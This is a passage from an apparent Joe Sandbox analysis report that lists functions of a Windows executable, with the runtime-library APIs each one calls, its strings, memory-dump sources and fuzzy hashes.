Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2302ca60823f266ee403192b38d82632f3600e312b6eaa9bdd1a18a282298c45
Instruction ID: 6d8bf8dabd1ab5d133c159f9e36bba7329598a3b9bf02b29fede3bfc543e8754
Opcode Fuzzy Hash: 2302ca60823f266ee403192b38d82632f3600e312b6eaa9bdd1a18a282298c45
Instruction Fuzzy Hash: E0F09661B1AB4292FB10AB28E458B399731FF84B65FD50235D67D462F4DF2CD189CB20

Function 00007FF7ABC450D0 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FF7ABC451F3
__AdjustPointer.LIBCMT ref: 00007FF7ABC4523E

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: f326ad5175e3b62aa93a89792347835425af060cf54c4b9b7bd193f230058973
Instruction ID: 7a2fb250236abac861cae26ae33399b5b52d1af86ebb80eb8d7ba088bc578d72
Opcode Fuzzy Hash: f326ad5175e3b62aa93a89792347835425af060cf54c4b9b7bd193f230058973
Instruction Fuzzy Hash: 35B1D331E0B64282EA65FB199048A3DF792EF44B85F9B8436DE4D077B5DE3CE6418320

Function 00007FF7ABC42440 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF7ABC424C7
MultiByteToWideChar.KERNEL32 ref: 00007FF7ABC42549
SysAllocString.OLEAUT32 ref: 00007FF7ABC42556

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 4c4ed421752b83d501d5bb88631d23af3d185d3576346463c074d9e7fe7b9955
Instruction ID: 5b18246aa6e619dc8f517f09c85f1746587e7c1bb37875a926e7ee4a60f2f8d7
Opcode Fuzzy Hash: 4c4ed421752b83d501d5bb88631d23af3d185d3576346463c074d9e7fe7b9955
Instruction Fuzzy Hash: 0A417C25A1674186EB14BF39D415B78A292FF44BB4F850634D96D4B7F0EF3CD2818320

Function 00007FF7ABC5E990 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7ABC5E9B8
_set_statfp.LIBCMT ref: 00007FF7ABC5E9D3
_set_statfp.LIBCMT ref: 00007FF7ABC5E9EF
_set_statfp.LIBCMT ref: 00007FF7ABC5EA2B

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: cd52082943f980d58492013c26f8fb82f062a7bb36eec0fc851e741c7c142c53
Instruction ID: cc1f4c23770ad6dbbac9e32b9a4648086754ee1b2d69f835f5ce4506cdba73e8
Opcode Fuzzy Hash: cd52082943f980d58492013c26f8fb82f062a7bb36eec0fc851e741c7c142c53
Instruction Fuzzy Hash: 8C118262F9DA1352F658317CE4D2B79D5406F58364FC70734E67E162F68F2C68408121

Function 00007FF7ABC571C4 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7ABC4C9D3,?,?,00000000,00007FF7ABC4CC6E,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC571E3
FlsSetValue.KERNEL32(?,?,?,00007FF7ABC4C9D3,?,?,00000000,00007FF7ABC4CC6E,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC57202
FlsSetValue.KERNEL32(?,?,?,00007FF7ABC4C9D3,?,?,00000000,00007FF7ABC4CC6E,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC5722A
FlsSetValue.KERNEL32(?,?,?,00007FF7ABC4C9D3,?,?,00000000,00007FF7ABC4CC6E,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC5723B
FlsSetValue.KERNEL32(?,?,?,00007FF7ABC4C9D3,?,?,00000000,00007FF7ABC4CC6E,?,?,?,?,?,00007FF7ABC4CBFA), ref: 00007FF7ABC5724C

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: f35424abd28038474a29b95bfeff797059f55abd19cfba0c666cbc8005d469a5
Instruction ID: 1f9e27968b72bf86e0a4f93b434dafcc9d98427252383ff4b65558ce45eb4b62
Opcode Fuzzy Hash: f35424abd28038474a29b95bfeff797059f55abd19cfba0c666cbc8005d469a5
Instruction Fuzzy Hash: C0119D60B4F35241FA98B7699A81939A1925F547F0FC64336E83D0A7F7DE2CA5814230

Function 00007FF7ABC57058 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF7ABC57069
FlsSetValue.KERNEL32 ref: 00007FF7ABC57088
FlsSetValue.KERNEL32 ref: 00007FF7ABC570B0
FlsSetValue.KERNEL32 ref: 00007FF7ABC570C1
FlsSetValue.KERNEL32 ref: 00007FF7ABC570D2

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 4263036b582548b7958096a9d1bffdf656f94b1191ee60feb7a57038dce2b1f3
Instruction ID: a40dd66e1f075b86d3d4ebe29073395d35a8f9e816fc6a0489dc43b1c32e0c71
Opcode Fuzzy Hash: 4263036b582548b7958096a9d1bffdf656f94b1191ee60feb7a57038dce2b1f3
Instruction Fuzzy Hash: BB113960A8B30341FA98B36D85D1D7991D24F90770FDA0B79E93E0A2F7ED2CB5818231

Function 00007FF7ABC3C1C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 319COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC3C642
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC3C648
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC3C64E

Strings

, xrefs: 00007FF7ABC3C23F

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-3916222277
Opcode ID: 5f376059e06d9fe9c7a00089e6956f19652ed4f00f2701aae3a7620824b6b20a
Instruction ID: d42d4940c0dd509909854d1e5c0f1adb869a4289fcaa994e3744d2ad2ea8d734
Opcode Fuzzy Hash: 5f376059e06d9fe9c7a00089e6956f19652ed4f00f2701aae3a7620824b6b20a
Instruction Fuzzy Hash: 3BD1BF62E06B4280EB14FB69C444ABDE361EB05B98FD65132DE1D176BACF38D885D360

Function 00007FF7ABC59D2C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 221COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC5A00B

Part of subcall function 00007FF7ABC64E28: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC64E45

Strings

UTF-8, xrefs: 00007FF7ABC59F8A
ccs, xrefs: 00007FF7ABC59F46
UTF-16LEUNICODE, xrefs: 00007FF7ABC59FA9

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 398b53326ae3c026d8ef7bcb4cf0aed91f06653734689e020cf0110d6b79d4c6
Instruction ID: d731b2f33dff075445b3c8a0cebe515dff56eb5f0fa2389584d6887bd9354fa5
Opcode Fuzzy Hash: 398b53326ae3c026d8ef7bcb4cf0aed91f06653734689e020cf0110d6b79d4c6
Instruction Fuzzy Hash: F2811572E4E24285FB657F2DC1D0A79F6A0EB10B44FD74271DA0E436B4DBADE8819321

Function 00007FF7ABC59A68 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC59D11

Part of subcall function 00007FF7ABC65010: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC6502D

Strings

UTF-8, xrefs: 00007FF7ABC59C94
UTF-16LEUNICODE, xrefs: 00007FF7ABC59CB5
ccs, xrefs: 00007FF7ABC59C5D

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 70b1faf14e569e202865952ac99b21c55bfbcad33b38386691814d14d433bd96
Instruction ID: d6a773652378825d7fbcaf767ff3655b045ca23dbea0c5814b4c52bb6fa5e7c1
Opcode Fuzzy Hash: 70b1faf14e569e202865952ac99b21c55bfbcad33b38386691814d14d433bd96
Instruction Fuzzy Hash: C9810331E8E24285F7746A2D82D4E38ABE09F12748FD752B1C98E471B5DAADB8419321

Function 00007FF7ABC46444 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7ABC464B4
_CallSETranslator.LIBVCRUNTIME ref: 00007FF7ABC464FF

Strings

MOC, xrefs: 00007FF7ABC464C8
RCC, xrefs: 00007FF7ABC464D0

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 256b27d133a9fd6dcb879e39cf91acb48b1b141aab8914266f1ba43c76c4a0d2
Instruction ID: 8a0994261ca1ec460e87137767cc3868b5cb79475f129e811b9dc60f655aa947
Opcode Fuzzy Hash: 256b27d133a9fd6dcb879e39cf91acb48b1b141aab8914266f1ba43c76c4a0d2
Instruction Fuzzy Hash: DB91AF73A09B818AE710DB68E4446ACBBB1FB45788F51413AEB8D07779DF38D291CB10

Function 00007FF7ABC399C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC39BD7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC39BDD

Part of subcall function 00007FF7ABC37870: __std_exception_copy.LIBVCRUNTIME ref: 00007FF7ABC378CD

Strings

assert json failed, xrefs: 00007FF7ABC39BE3
in Json::Value::setComment(): Comments must start with /, xrefs: 00007FF7ABC39C15

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: assert json failed$in Json::Value::setComment(): Comments must start with /
API String ID: 1944019136-3359747093
Opcode ID: 09134355286d258f424c871b66d32a5ec76972a8ea806c7188027cf1c95048a0
Instruction ID: 6ec547aaafd10ebbe61a7342ab72ded512e01540c40a68672722f2053573539d
Opcode Fuzzy Hash: 09134355286d258f424c871b66d32a5ec76972a8ea806c7188027cf1c95048a0
Instruction Fuzzy Hash: 9261E722F19B8142EA14EB19E550B79E361FB85784FC25131DA9D077B2DFBCE594C310

Function 00007FF7ABC44A90 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7ABC44ABB
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7ABC44B52
RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF7ABC436BA), ref: 00007FF7ABC44BAC

Strings

csm, xrefs: 00007FF7ABC44B39

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 755a5fe7f73a5d689be82d0671b68300f10bb52e7acddf2d664537cb0fed4d16
Instruction ID: 635e1bc5c17a52df912cbf08dd86e2f4896683c30b641c845a537209d6b9a1b9
Opcode Fuzzy Hash: 755a5fe7f73a5d689be82d0671b68300f10bb52e7acddf2d664537cb0fed4d16
Instruction Fuzzy Hash: D651C331B1AA028ADB14EB19D448E3DB797EB44B98FA68130DA8A47774DF7CE941C710

Function 00007FF7ABC469C4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7ABC469EC
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF7ABC46AD4

Strings

csm, xrefs: 00007FF7ABC46A0E
csm, xrefs: 00007FF7ABC46B26

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 6b8a965ca43953807a5e732a6252003fd0f606180e286370bd46e2709a45e06e
Instruction ID: 6ceb107e87769640a0326a71fa51e883e33640177f068ce7f3057b9da5532e75
Opcode Fuzzy Hash: 6b8a965ca43953807a5e732a6252003fd0f606180e286370bd46e2709a45e06e
Instruction Fuzzy Hash: A7514732A0974286EB30AF59C048B28B7A2FB40B84F968171DA4D477F9CF3CEA50C710

Function 00007FF7ABC461D4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7ABC46233
_CallSETranslator.LIBVCRUNTIME ref: 00007FF7ABC4627F

Strings

MOC, xrefs: 00007FF7ABC46247
RCC, xrefs: 00007FF7ABC4624F

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 3a355bcac8b81883a2ccad545a664a2c8bdd8461706ace05c86d8c2225779f94
Instruction ID: 2f2f85aaf1560351a06253cd1891979dad08f0a34bb086ca502f65968004d707
Opcode Fuzzy Hash: 3a355bcac8b81883a2ccad545a664a2c8bdd8461706ace05c86d8c2225779f94
Instruction Fuzzy Hash: 09619132909BC581DB60AF19E4447AAB7A1FB84B84F454235EB8D03B79CF3CD294CB10

Function 00007FF7ABC37260 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC372CB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF7ABC37313
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC373A3

Strings

bad locale name, xrefs: 00007FF7ABC373C6

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2775327233-1405518554
Opcode ID: a698c5461aabfef6e2bb9a405ed0cbf50fc6a8d898b2ee4a9a538becd8a72348
Instruction ID: 14d796692f499408e69adee0fa01d5d7164389fab60caea87db829a682f858e3
Opcode Fuzzy Hash: a698c5461aabfef6e2bb9a405ed0cbf50fc6a8d898b2ee4a9a538becd8a72348
Instruction Fuzzy Hash: D1419F22B0BA41C9FB68EF79D491BBCB364EF44708F890035DE0D26A76CE38D5558324

Function 00007FF7ABC08880 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC08A83

Strings

ios_base::eofbit set, xrefs: 00007FF7ABC08A47
ios_base::failbit set, xrefs: 00007FF7ABC08A40
ios_base::badbit set, xrefs: 00007FF7ABC08A34

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3668304517-1866435925
Opcode ID: 1cb21ff558e73b4d3a28ad597b933c03072717efd9edd71730276d64137def7d
Instruction ID: 1dea0b5079489f25011719c3da933feaee285e903a182d48f6ade7fd03be7f56
Opcode Fuzzy Hash: 1cb21ff558e73b4d3a28ad597b933c03072717efd9edd71730276d64137def7d
Instruction Fuzzy Hash: BC519132B09B8185EB00EB28E4907A9B7A1FB84B84F918536DB8C47B79DF3CD545CB50

Function 00007FF7ABC25330 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC2539B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF7ABC253E3
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC25473

Strings

bad locale name, xrefs: 00007FF7ABC25496

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2775327233-1405518554
Opcode ID: 70f948192818e844476bc654633a38caa76262b551cebd3f70368972ff52011b
Instruction ID: 133e278fe5a7bb4319f494748b527d5538c060e3e3588978064ba1e83e48dab5
Opcode Fuzzy Hash: 70f948192818e844476bc654633a38caa76262b551cebd3f70368972ff52011b
Instruction Fuzzy Hash: BF416A32B0BA41CAEB14EF78D491BEDA3A4EF44708F854434DA4D26A79CE38D5559324

Function 00007FF7ABC57678 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF7ABC576F7
WriteFile.KERNEL32 ref: 00007FF7ABC579BF
WriteFile.KERNEL32 ref: 00007FF7ABC57A05
GetLastError.KERNEL32 ref: 00007FF7ABC57ABB

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: faab91da3998636e1b2c1f14adb7718455e8f0148080d24a1a297694853ee6f7
Instruction ID: bbfd1f69170ec859a6576a59a5ccf064baa8c7a9136f0463de13410767d17fa5
Opcode Fuzzy Hash: faab91da3998636e1b2c1f14adb7718455e8f0148080d24a1a297694853ee6f7
Instruction Fuzzy Hash: 9ED16632B09A5089E711DF78C580ABC77B5FB04B98B854236DE5D97BBADE38D146C320

Function 00007FF7ABC4E370 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4E3E9
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4E445
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4E480
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4E4A5

Memory Dump Source

